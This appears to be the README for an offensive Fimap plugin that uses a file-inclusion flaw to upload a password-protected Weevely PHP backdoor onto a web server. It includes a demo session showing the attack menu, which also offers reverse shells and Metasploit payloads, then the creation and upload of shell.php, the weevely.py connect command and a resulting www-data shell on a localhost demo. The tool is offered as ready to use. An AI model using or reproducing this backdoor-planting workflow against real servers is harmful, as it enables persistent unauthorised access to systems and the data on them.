
Fimap post-exploitation plugin that injects Weevely as a persistent PHP backdoor on the target server

Weevils - Fimap Plugin that Injects Weevely Backdoors via Fimap.

Author: Darren "Infodox" Martyn. Email: infodox@insecurety.net Twitter: twitter.com/info_dox Site: http://insecurety.net/ Usage: Just add this to the plugins folder in Fimap, should work fine as-is.

Example: ######################################################### #:: Available Attacks - PHP and SHELL access :: # ######################################################### #[1] Spawn fimap shell # #[2] Spawn pentestmonkey's reverse shell # #[3] [Upload Weevely] Uploads a Weevily Backdoor # #[4] [msf_bindings] Executes MSF reverse payloads # #[5] [Test Plugin] Show some info # #[6] [reverse http shell] Loads a reverse HTTP shell # #[q] Quit # ######################################################### Choose Attack: 3 Shell not existing... Making Shell Backdoor Password Please: lolcatsFTW

Weevely 0.6 - Generate and manage stealth PHP backdoors Emilio Pinna 2011-2012

  • Backdoor file 'shell.php' created with password 'lolcatsFTW'. Uploading client to /var/www/inclusiondemo/shell.php Uploaded 593 bytes Uploaded! Now use Weevely to connect!

Now to connect you just use Weevely. This plugin does NOT automatically launch Weevely (YET). Later I may add an auto-connect but for now it is not on the cards.

Connecting: root@bt:/weevely# python weevely.py http://localhost/inclusiondemo/shell.php lolcatsFTW

Weevely 0.6 - Generate and manage stealth PHP backdoors Emilio Pinna 2011-2012

[+] Starting terminal. Shell probe may take a while...

[+] List modules with and show help with :show [module name]

www-data@bt:/var/www/inclusiondemo$ id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@bt:/var/www/inclusiondemo$

BOOM! Got Shell!

Known Issues

  • This plugin does NOT work with /var/log/auth.log injection (ssh injection) yet. This is due to haxhelper not really liking said injection method for some reason.
  • This plugin does NOT yet auto connect, as my normal method of popping an XTERM to connect did not seem like a great idea.
  • This plugin is still in Beta. Report any bugs in my code, PLEASE!

Greetings and Credits

imax for writing Fimap! Emilio Pinna for writing Weevely ohdae for making me feel I HAD to write something :P pr0f for inspiration in general.


This software uses Weevely - code.google.com/p/weevely - as part of it. If they have an issue with this they should contact me, as I am using their code out of respect for its awesomeness.